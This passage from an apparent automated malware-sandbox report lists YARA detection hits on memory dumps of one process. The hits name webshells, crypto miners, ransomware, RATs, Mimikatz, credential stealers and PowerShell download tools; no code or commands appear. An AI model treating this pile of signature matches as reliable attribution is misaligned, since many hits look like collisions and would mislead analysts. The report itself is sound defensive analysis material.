00000026.00000003.18327835238.00000138BDC5F000.00000004.00000001.sdmp, Author: Joe Security Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18316462962.00000138BD524000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18358332585.00000138BD221000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_LimeRAT, Description: Yara detected LimeRAT, Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, Author: Joe Security Rule: APT9002Strings, Description: 9002 Identifying Strings, Source: 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp, Author: Seth Hardy Rule: RemCom_RemoteCommandExecution, Description: Detects strings from RemCom tool, Source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_RemComRemoteAdmin, Description: Yara detected RemCom RemoteAdmin tool, Source: 00000026.00000003.18340288495.00000138BCB46000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_Backdoor_Win_GoRat_Memory, Description: Identifies GoRat malware in memory based on strings., Source: 00000026.00000003.18357503095.00000138BE2D0000.00000004.00000001.sdmp, Author: FireEye Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18424893452.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: TA17_293A_malware_1, Description: inveigh pen testing tools & related artifacts, Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, Author: US-CERT Code Analysis Team (modified by Florian Roth) Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18297877287.00000138BE565000.00000004.00000001.sdmp, Author: Florian Roth Rule: ZxShell_Jul17, Description: Detects a ZxShell - CN threat group, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_GhostRat, Description: Yara detected GhostRat, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: Joe Security Rule: gh0st, Description: unknown, Source: 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp, Author: https://github.com/jackcr/ Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18338726635.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18327109777.00000138BDB15000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_sql, Description: ASP webshell giving SQL access. Might also be a dual use tool., Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18438856533.00000138BDFB8000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18334118643.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_asp_generic_eval_on_input, Description: Generic ASP webshell which uses any eval/exec function directly on user input, Source: 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_PowerShell_Caret_Obfuscation_2, Description: Detects powershell keyword obfuscated with carets, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_PowerShell_IEX_Download_Combo, Description: Detects strings found in sample from CN group repo leak in October 2018, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Florian Roth Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18354456744.00000138BD776000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18330858645.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18294992845.00000138BE1C8000.00000004.00000001.sdmp, Author: Joe Security Rule: Ammyy_Admin_AA_v3, Description: Remote Admin Tool used by APT group Anunak (ru) - file AA_v3.4.exe and AA_v3.5.exe, Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Conti_ransomware, Description: Yara detected Conti ransomware, Source: 00000026.00000003.18336867211.00000138BDB98000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp, Author: Joe Security Rule: Cobaltbaltstrike_Payload_Encoded, Description: Detects CobaltStrike payloads, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Avast Threat Intel Team Rule: webshell_php_obfuscated_encoding, Description: PHP webshell obfuscated by encoding, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18343140074.00000138BE0C0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_XORed_Mozilla, Description: Detects suspicious XORed keyword - Mozilla/5.0, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Voidcrypt, Description: Yara detected Voidcrypt Ransomware, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000026.00000003.18430007878.00000138BEA1E000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18326445165.00000138BE3D9000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18318886682.00000138BE45C000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18322216000.00000138BDE5C000.00000004.00000001.sdmp, Author: Joe Security Rule: Oilrig_IntelSecurityManager_macro, Description: Detects OilRig malware, Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, Author: Eyal Sela (slightly modified by Florian Roth) Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18309314406.00000138BD524000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Niros, Description: Yara detected Niros Ransomware, Source: 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18306821141.00000138BD516000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18308141829.00000138BCCD6000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_obfuscated, Description: ASP webshell obfuscated, Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_asp_generic, Description: Generic ASP webshell which uses any eval/exec function indirectly on user input or writes a file, Source: 00000026.00000003.18356753862.00000138BDCA0000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: Certutil_Decode_OR_Download, Description: Certutil Decode, Source: 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp, Author: Florian Roth Rule: CredTheft_MSIL_ADPassHunt_2, Description: unknown, Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, Author: FireEye Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18357864029.00000138BE774000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18342357735.00000138BDE5C000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_base64_encoded_payloads, Description: php webshell containing base64 encoded payload, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: webshell_php_by_string_known_webshell, Description: Known PHP Webshells which contain unique strings, lousy rule for low hanging fruits. Most are catched by other rules in here but maybe these catch different versions., Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_hidden_tear, Description: Yara detected HiddenTear ransomware, Source: 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18342844275.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18341014844.00000138BCCD6000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Buran, Description: Yara detected Buran Ransomware, Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Gocoder_3, Description: Yara detected Gocoder ransomware, Source: 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, Author: Florian Roth Rule: PUA_CryptoMiner_Jan19_1, Description: Detects Crypto Miner strings, Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18290273099.00000138BE733000.00000004.00000001.sdmp, Author: Joe Security Rule: Hacktool_Strings_p0wnedShell, Description: p0wnedShell Runspace Post Exploitation Toolkit - file p0wnedShell.cs, Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, Author: Florian Roth Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18291478941.00000138BCE0D000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18424078658.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: GoldDragon_Aux_File, Description: Detects export from Gold Dragon - February 2018, Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, Author: Florian Roth Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18432385873.00000138BDEF2000.00000004.00000001.sdmp, Author: Joe Security Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MSIL_Load_Encrypted_Assembly, Description: Yara detected MSIL_Load_Encrypted_Assembly, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: Joe Security Rule: CVE_2018_4878_0day_ITW, Description: unknown, Source: 00000026.00000003.18293349131.00000138BD896000.00000004.00000001.sdmp, Author: unknown Rule: WScript_Shell_PowerShell_Combo, Description: Detects malware from Middle Eastern campaign reported by Talos, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Florian Roth Rule: HackTool_Samples, Description: Hacktool, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: unknown Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Cryptolocker, Description: Yara detected Cryptolocker ransomware, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Wannacry, Description: Yara detected Wannacry ransomware, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Joe Security Rule: MirageStrings, Description: Mirage Identifying Strings, Source: 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp, Author: Seth Hardy Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18409582995.00000138BD8C1000.00000004.00000001.sdmp, Author: Joe Security Rule: webshell_php_dynamic_big, Description: PHP webshell using $a($code) for kind of eval with encoded blob to decode, e.g. b374k, Source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18329637762.00000138BD6F3000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18332072554.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18341553900.00000138BCF14000.00000004.00000001.sdmp, Author: Joe Security Rule: APT_MAL_Sandworm_Exaramel_Configuration_Key, Description: Detects the encryption key for the configuration file used by Exaramel malware as seen in sample e1ff72[..., Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: FR/ANSSI/SDO Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18325502433.00000138BEAA2000.00000004.00000001.sdmp, Author: Joe Security Rule: Mimikatz_Memory_Rule_1, Description: Detects password dumper mimikatz in memory (False Positives: an service that could have copied a Mimikatz executable, AV signatures), Source: 00000026.00000003.18302973741.00000138BE4E1000.00000004.00000001.sdmp, Author: Florian Roth Rule: Tofu_Backdoor, Description: Detects Tofu Trojan, Source: 00000026.00000003.18346478440.00000138BD16D000.00000004.00000001.sdmp, Author: Cylance Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Coinhive, Description: Yara detected Coinhive miner, Source: 00000026.00000003.18306680829.00000138BD4FA000.00000004.00000001.sdmp, Author: Joe Security Rule: Base64_PS1_Shellcode, Description: Detects Base64 encoded PS1 Shellcode, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Nick Carr, David Ledbetter Rule: Pupy_Backdoor, Description: Detects Pupy backdoor, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Florian Roth Rule: webshell_php_gzinflated, Description: PHP webshell which directly eval()s obfuscated string, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Arnim Rupp Rule: JoeSecurity_Meterpreter, Description: Yara detected Meterpreter, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_RevengeRAT, Description: Yara detected RevengeRAT, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_EvilGnomeRC5Key, Description: Yara detected Linux EvilGnome RC5 key, Source: 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp, Author: unknown Rule: SUSP_Base64_Encoded_Hex_Encoded_Code, Description: Detects hex encoded code that has been base64 encoded, Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Allatori_JAR_Obfuscator, Description: Yara detected Allatori_JAR_Obfuscator, Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, Author: Joe Security Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18313135929.00000138BE99B000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_bitcoinminer, Description: Yara detected BitCoin Miner, Source: 00000026.00000003.18354111280.00000138BE522000.00000004.00000001.sdmp, Author: Joe Security Rule: CoinMiner_Strings, Description: Detects mining pool protocol string in Executable, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Florian Roth Rule: WScriptShell_Case_Anomaly, Description: Detects obfuscated wscript.shell commands, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Florian Roth Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Joe Security Rule: vanquish_2, Description: Webshells Auto-generated - file vanquish.exe, Source: 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp, Author: Yara Bulk Rule Generator by Florian Roth Rule: webshell_php_by_string_obfuscation, Description: PHP file containing obfuscation strings. Might be legitimate code obfuscated for whatever reasons, a webshell or can be used to insert malicious Javascript for credit card skimming, Source: 